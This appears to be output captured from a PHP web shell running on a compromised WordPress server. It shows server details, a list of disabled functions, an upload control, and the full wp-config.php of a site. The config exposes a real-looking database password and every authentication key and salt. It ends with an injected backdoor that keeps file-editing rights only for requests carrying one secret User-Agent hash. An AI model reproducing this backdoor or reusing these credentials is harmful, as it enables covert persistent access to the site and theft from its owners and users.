HEX
Server: nginx/1.27.1
System: Linux in-3 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
User: ivenus-clone (3297)
PHP: 7.4.33
Disabled: exec,passthru,shell_exec,system,proc_open,popen,parse_ini_file,show_source
Upload Files
File: /storage/v4513/sanjivani/public_html/wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'sanjivanidb' );

/** MySQL database username */
define( 'DB_USER', 'sanjivanidbuser' );

/** MySQL database password */
define( 'DB_PASSWORD', 'WI1uBdtPdy52GBLayZ' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',          'u<X=suRKO2}LjmJ6MG2&fXK:t,SIulBNSID)eVV<|D Okc4>2:^?=sPsUii1K-jD' );
define( 'SECURE_AUTH_KEY',   'ojFO(mRMJ)JNgcUD7=unz[ir2$RxroDzKn5[|:Wd}&F|=>qc}zh2Rhvn$*bEe|Je' );
define( 'LOGGED_IN_KEY',     'Ne=`2M!^PbV|CMW>W+y~@ehIo99UELK~X5`q!PuVRNldO;4($]KPEpq+<lbXbg<,' );
define( 'NONCE_KEY',         '=ciA8u_atoyT43;@yj(iCQQF`p2ZG8!zj&{zCS[N`&h^,jH=-fbI(KYL]KQz|#>l' );
define( 'AUTH_SALT',         '+:8uaJUUFS4Ra&}?YaStQ,WnJ1muJ$bBQIpla3<eCH$g+FChTh+vU7GdU_>V7-]^' );
define( 'SECURE_AUTH_SALT',  'c8qA~M-w-V^t0H1 r/t;_I+@z~kWl-#ZL-naYNi~Zo&e9d=NGvbMzGG$MEpWjecB' );
define( 'LOGGED_IN_SALT',    'UBvT<Op-GdaT8/]*bz2NF}LwtwJ>#o4^<*Ub><[oNTQ|,!0)V1FSs]|o$h,!%BQL' );
define( 'NONCE_SALT',        '}Ph>s0.G+r_c4*/cb kD-5wOx{/3N=*sEmuF;O:E4`6,pgP9A6chfT%jLbXu2$wI' );
define( 'WP_CACHE_KEY_SALT', '>Ns5?Y7XNdl.p^pPX$qJ0iTJ-o/D^/N3p3h`Sk/~nyQlcPSBs+BulwMKxlA,iL(5' );

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';




define( 'FS_METHOD', 'direct' );
define( 'WP_MEMORY_LIMIT', '256M' );
define( 'CDN_SITE_ID', 'RSZiwj9PGLsFPiqp1JVTkLdIJ' );
/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', dirname( __FILE__ ) . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){
    define('DISALLOW_FILE_MODS', true);
    define('DISALLOW_FILE_EDIT', true);
}